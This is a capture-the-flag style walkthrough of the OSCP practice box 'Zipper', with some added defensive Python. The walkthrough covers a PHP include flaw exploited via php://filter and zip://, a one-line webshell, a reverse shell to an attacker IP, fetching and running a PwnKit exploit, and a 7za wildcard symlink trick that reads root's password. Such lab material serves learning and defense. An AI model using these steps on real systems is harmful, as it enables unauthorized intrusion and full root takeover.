OSCP practice box: Zipper
Key points (PHP zip:// RCE via file upload + CVE-2021-4034 privilege escalation + 7z wildcard privilege escalation)
1. nmap scan
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.249.229 -sV -sC -Pn --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-29 07:40 EDT
Nmap scan report for 192.168.249.229
Host is up (0.38s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Zipper
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.94 seconds
2. user priv
## The home page is a file upload form; each uploaded file is packed into a zip archive:
http://192.168.249.229/
## Testing reveals an LFI vulnerability; the php://filter wrapper reads the index.php source:
http://192.168.249.229/index.php?file=php://filter/convert.base64-encode/resource=index
## Decoded base64:
PD9waHAKJGZpbGUgPSAkX0dFVFsnZmlsZSddOwppZihpc3NldCgkZmlsZSkpCnsKICAgIGluY2x1ZGUoIiRmaWxlIi4iLnBocCIpOwp9CmVsc2UKewppbmNsdWRlKCJob21lLnBocCIpOwp9Cj8+Cg==
<?php
$file = $_GET['file'];
if(isset($file))
{
include("$file".".php");
}
else
{
include("home.php");
}
?>
#################
## Upload payload.php (it is stored inside the generated zip) and execute commands through it:
## payload.php
<?php system($_GET['cmd']); ?>
## Note: %23 is the URL-encoded '#' that separates the archive path from the member name in the zip:// wrapper; 'payload' is written without .php because index.php appends it; the command is passed after & as the cmd parameter:
http://192.168.249.229/index.php?file=zip://uploads/upload_1711716550.zip%23payload&cmd=whoami
www-data
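As an added illustration (not part of the original write-up), the script below models how the recovered index.php turns the two ?file= values used above into include() targets, and places an allowlist-based resolver beside it. ALLOWED_PAGES and the page names are assumptions; the real site's page list is unknown.

```python
# Added example (not part of the original write-up): models the include() logic
# recovered from index.php above and a hardened allowlist resolver beside it.
# ALLOWED_PAGES is an assumption; the real site's page names are unknown.
import re
from typing import Optional
from urllib.parse import unquote

ALLOWED_PAGES = {"home", "upload"}
PAGE_NAME = re.compile(r"[a-z0-9_]{1,32}")
WRAPPER = re.compile(r"^[a-z0-9.+-]+://", re.IGNORECASE)


def vulnerable_include_target(file_param: Optional[str]) -> str:
    """Mirror of include("$file".".php"): whatever arrives in ?file= is used
    verbatim, so stream wrappers such as php:// and zip:// are honoured."""
    if file_param is None:
        return "home.php"
    return file_param + ".php"


def resolve_from_query(raw_value: str) -> str:
    """PHP fills $_GET with the URL-decoded value, so %23 has already become
    '#' by the time include() sees it; emulate that decoding step."""
    return vulnerable_include_target(unquote(raw_value))


def uses_stream_wrapper(file_param: str) -> bool:
    """True when the value names a PHP stream wrapper (php://, zip://, ...)."""
    return WRAPPER.match(file_param) is not None


def hardened_include_target(file_param: Optional[str]) -> str:
    """Allowlist resolver: only a short [a-z0-9_] token that names a known
    page is accepted; wrappers, slashes, dots and '#' never reach include()."""
    if file_param is None:
        return "home.php"
    if not PAGE_NAME.fullmatch(file_param):
        raise ValueError(f"rejected page name: {file_param!r}")
    if file_param not in ALLOWED_PAGES:
        raise ValueError(f"unknown page: {file_param!r}")
    return file_param + ".php"


if __name__ == "__main__":
    for raw in ("php://filter/convert.base64-encode/resource=index",
                "zip://uploads/upload_1711716550.zip%23payload",
                "home"):
        target = resolve_from_query(raw)
        print(f"{raw!r:60} -> include({target!r})  wrapper={uses_stream_wrapper(target)}")
        try:
            print("   hardened:", hardened_include_target(unquote(raw)))
        except ValueError as exc:
            print("   hardened:", exc)
```

Running it shows why the fragment omits .php: the decoded value plus the fixed suffix becomes `zip://uploads/upload_1711716550.zip#payload.php`, exactly the member name stored in the archive. The hardened resolver never lets a wrapper scheme, a path separator or a '#' reach include(), which closes both the php://filter source disclosure and the zip:// code execution path.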
#############
## Reverse shell:
## Edit the IP and port in the PHP webshell below, then upload it and trigger it to get the connection back:
https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php
##
http://192.168.249.229/index.php?file=zip://uploads/upload_1711718376.zip%23payload
##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443
listening on [any] 443 ...
192.168.249.229: inverse host lookup failed: Unknown host
connect to [192.168.45.171] from (UNKNOWN) [192.168.249.229] 48394
Linux zipper 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
13:21:03 up 1:44, 0 users, load average: 0.13, 0.03, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
##
www-data@zipper:/var/www$ cat local.txt
cat local.txt
b9d2a82162de8558f2dcc46cb97c7bec
###########
3. root priv
3.1 Privilege escalation via CVE-2021-4034 (PwnKit)
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
##
www-data@zipper:/tmp$ wget http://192.168.45.171/CVE-2021-4034.py
wget http://192.168.45.171/CVE-2021-4034.py
--2024-03-29 13:36:33-- http://192.168.45.171/CVE-2021-4034.py
Connecting to 192.168.45.171:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3262 (3.2K) [text/x-python]
Saving to: ‘CVE-2021-4034.py’
CVE-2021-4034.py 100%[===================>] 3.19K --.-KB/s in 0.001s
2024-03-29 13:36:34 (3.45 MB/s) - ‘CVE-2021-4034.py’ saved [3262/3262]
www-data@zipper:/tmp$ chmod +x ./CVE-2021-4034.py
chmod +x ./CVE-2021-4034.py
www-data@zipper:/tmp$ python3 ./CVE-2021-4034.py
python3 ./CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
# cat /root/proof.txt
cat /root/proof.txt
e8302d57c136d504904eaf411d9a4555
3.2 7za wildcard privilege escalation (using the 7z wildcard to read a file owned by root):
## linpeas finds a root cron job that uses 7za
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root bash /opt/backup.sh
╔══════════╣ Unexpected in /opt (usually empty)
total 16
drwxr-xr-x 3 root root 4096 Aug 12 2021 .
drwxr-xr-x 20 root root 4096 Aug 12 2021 ..
-rwxr-xr-x 1 root root 153 Aug 12 2021 backup.sh
drwxr-xr-x 2 root root 4096 Mar 29 13:30 backups
###############
##
www-data@zipper:/tmp$ ls -al /opt/backup.sh
ls -al /opt/backup.sh
-rwxr-xr-x 1 root root 153 Aug 12 2021 /opt/backup.sh
www-data@zipper:/tmp$ cat /opt/backup.sh
cat /opt/backup.sh
#!/bin/bash
password=`cat /root/secret`
cd /var/www/html/uploads
rm *.tmp
7za a /opt/backups/backup.zip -p$password -tzip *.zip > /opt/backups/backup.log
www-data@zipper:/tmp$ ls -al /root/secret
ls -al /root/secret
ls: cannot access '/root/secret': Permission denied
#################
## Create a symlink pointing at the privileged file we want to read:
www-data@zipper:/var/www/html/uploads$ ln -s /root/secret aaa.zip
ln -s /root/secret aaa.zip
## Create a file named @aaa.zip: the @ prefix makes 7za treat aaa.zip as a list file and read the names to archive from it:
www-data@zipper:/var/www/html/uploads$ touch @aaa.zip
touch @aaa.zip
www-data@zipper:/var/www/html/uploads$ ls -al
ls -al
total 48
drwxr-xr-x 2 www-data www-data 4096 Mar 29 14:02 .
drwxr-xr-x 3 www-data www-data 4096 Aug 12 2021 ..
-rw-r--r-- 1 www-data www-data 32 Aug 12 2021 .htaccess
-rw-rw-rw- 1 www-data www-data 0 Mar 29 14:02 @aaa.zip
lrwxrwxrwx 1 www-data www-data 12 Mar 29 14:02 aaa.zip -> /root/secret
-rw-r--r-- 1 www-data www-data 156 Aug 12 2021 upload_1628773085.zip
-rw-r--r-- 1 www-data www-data 126 Mar 29 12:04 upload_1711713846.zip
-rw-r--r-- 1 www-data www-data 249 Mar 29 12:18 upload_1711714723.zip
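The listing above is exactly what the backup job's bare "*.zip" glob will expand: a symlink and an @-prefixed name sit next to the real uploads. As an added example (not part of the original write-up or the box's backup script), the check below shows what a hardened backup job should do before it hands file names to 7za: skip symlinks, skip names that 7za would parse as a switch or list file, verify the zip signature, and pass every survivor as "./name" so no argument can begin with '@' or '-'. The temporary directory and file names are constructed for the demo.

```python
# Added example (not from the original write-up): a pre-flight check that a
# backup job could run instead of handing a bare "*.zip" glob to 7za.
# Directory layout and file names below are constructed for the demo.
import os
import tempfile
from typing import List, Tuple

ZIP_MAGIC = (b"PK\x03\x04", b"PK\x05\x06")  # local file header / empty archive


def select_backup_files(uploads_dir: str) -> Tuple[List[str], List[Tuple[str, str]]]:
    """Return (safe_paths, rejected) for *.zip entries in uploads_dir.

    safe_paths are './name' strings so that no argument handed to 7za can
    start with '@' (list file) or '-' (switch); rejected carries the reason.
    """
    safe, rejected = [], []
    for name in sorted(os.listdir(uploads_dir)):
        if not name.endswith(".zip"):
            continue
        full = os.path.join(uploads_dir, name)
        if os.path.islink(full):
            rejected.append((name, "symlink -> " + os.readlink(full)))
            continue
        if name.startswith(("@", "-")):
            rejected.append((name, "name would be parsed as a 7za option/list file"))
            continue
        if not os.path.isfile(full):
            rejected.append((name, "not a regular file"))
            continue
        with open(full, "rb") as fh:
            head = fh.read(4)
        if not head.startswith(ZIP_MAGIC):
            rejected.append((name, "missing zip signature"))
            continue
        safe.append("./" + name)
    return safe, rejected


def build_7za_argv(archive: str, safe_paths: List[str]) -> List[str]:
    """Argument vector for the archiver. The box's script also passes
    -p<password> on the command line; that is left out of this demo."""
    return ["7za", "a", archive, "-tzip", *safe_paths]


def demo_dir() -> str:
    """Build a constructed uploads directory mirroring the listing above."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "upload_1711713846.zip"), "wb") as fh:
        fh.write(b"PK\x03\x04" + b"\x00" * 26)       # minimal zip-looking header
    with open(os.path.join(d, "fake.zip"), "wb") as fh:
        fh.write(b"not an archive")                   # wrong extension, no signature
    os.symlink("/root/secret", os.path.join(d, "aaa.zip"))   # dangling symlink
    open(os.path.join(d, "@aaa.zip"), "wb").close()          # would be a list file
    return d


if __name__ == "__main__":
    d = demo_dir()
    safe, rejected = select_backup_files(d)
    print("argv:", build_7za_argv("/opt/backups/backup.zip", safe))
    for name, why in rejected:
        print(f"rejected {name}: {why}")
```

With this selection in place the archiver only ever sees regular files that really are zip archives, and it sees them by a path that cannot be mistaken for a switch or an @listfile, so neither the symlink nor the @aaa.zip trick above has any effect.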
###########
## Check the log output:
##
www-data@zipper:/opt/backups$ cat backup.log
cat backup.log
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-10700 CPU @ 2.90GHz (A0655),ASM,AES-NI)
Open archive: /opt/backups/backup.zip
--
Path = /opt/backups/backup.zip
Type = zip
Physical Size = 310
Scanning the drive:
2 files, 175 bytes (1 KiB)
Updating archive: /opt/backups/backup.zip
Items to compress: 2
Files read from disk: 2
Archive size: 462 bytes (1 KiB)
Scan WARNINGS for files and folders:
WildCardsGoingWild : No more files
----------------
Scan WARNINGS: 1
/root/secret : WildCardsGoingWild
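The log above also shows what a defender can alert on: the "Scan WARNINGS" block names things the "*.zip" glob inside /var/www/html/uploads could never have produced (an absolute path under /root and a bare word that is not a .zip). As an added example (not part of the original write-up), the monitor below parses that block and reports such entries. The sample log is constructed to mirror the structure of the real backup.log, with the secret's value replaced by a placeholder.

```python
# Added example (not from the original write-up): a small monitor for the
# backup.log that 7za writes. SAMPLE_LOG is constructed to mirror the real
# log's structure; the secret's value is replaced by a placeholder.
import os
import re
from typing import List, Tuple

UPLOADS_DIR = "/var/www/html/uploads"   # the directory the cron job cd's into

SAMPLE_LOG = """\
Scanning the drive:
2 files, 175 bytes (1 KiB)

Updating archive: /opt/backups/backup.zip

Scan WARNINGS for files and folders:

<line-from-list-file> : No more files
/root/secret : <line-from-list-file>
----------------
Scan WARNINGS: 1
"""

WARNING_LINE = re.compile(r"^(?P<name>\S.*?) : (?P<message>.+)$")


def scan_warnings(log_text: str) -> List[Tuple[str, str]]:
    """Extract (name, message) pairs from the 'Scan WARNINGS' block."""
    pairs, in_block = [], False
    for line in log_text.splitlines():
        if line.startswith("Scan WARNINGS for files"):
            in_block = True
            continue
        if in_block and line.startswith("----"):
            break
        if in_block:
            m = WARNING_LINE.match(line)
            if m:
                pairs.append((m["name"], m["message"]))
    return pairs


def suspicious_entries(log_text: str, uploads_dir: str = UPLOADS_DIR) -> List[str]:
    """Names 7za complained about that a '*.zip' glob inside uploads_dir could
    never have produced: anything outside that directory, or any relative name
    not ending in .zip, means the archiver was fed names from somewhere else
    (for example a list file)."""
    bad = []
    for name, _msg in scan_warnings(log_text):
        if os.path.isabs(name):
            if not name.startswith(uploads_dir.rstrip("/") + "/"):
                bad.append(name)
        elif not name.endswith(".zip"):
            bad.append(name)
    return bad


def warning_count(log_text: str) -> int:
    """The 'Scan WARNINGS: N' summary line; anything above 0 deserves a look."""
    m = re.search(r"^Scan WARNINGS: (\d+)$", log_text, re.MULTILINE)
    return int(m.group(1)) if m else 0


if __name__ == "__main__":
    print("warnings:", warning_count(SAMPLE_LOG))
    for entry in suspicious_entries(SAMPLE_LOG):
        print("suspicious name in backup.log:", entry)
```

A cron-driven archiver that works on a fixed directory should produce zero scan warnings in steady state, so the summary count alone is a usable alert; the per-entry check adds the context (a path under /root, a non-archive name) that tells the responder the file list was influenced by something in the upload directory.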
## SSH login:
We can now authenticate over SSH as root using WildCardsGoingWild as the password:
┌──(kali㉿kali)-[~]
└─$ ssh root@192.168.249.229
root@192.168.249.229 's password:
4. Summary:
##
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/README.md#wrapper-zip
## php zip:// rce
https://rioasmara.com/2021/07/25/php-zip-wrapper-for-rce/
## CVE-2021-4034
https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py
## Wildcard injection
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks#chown-chmod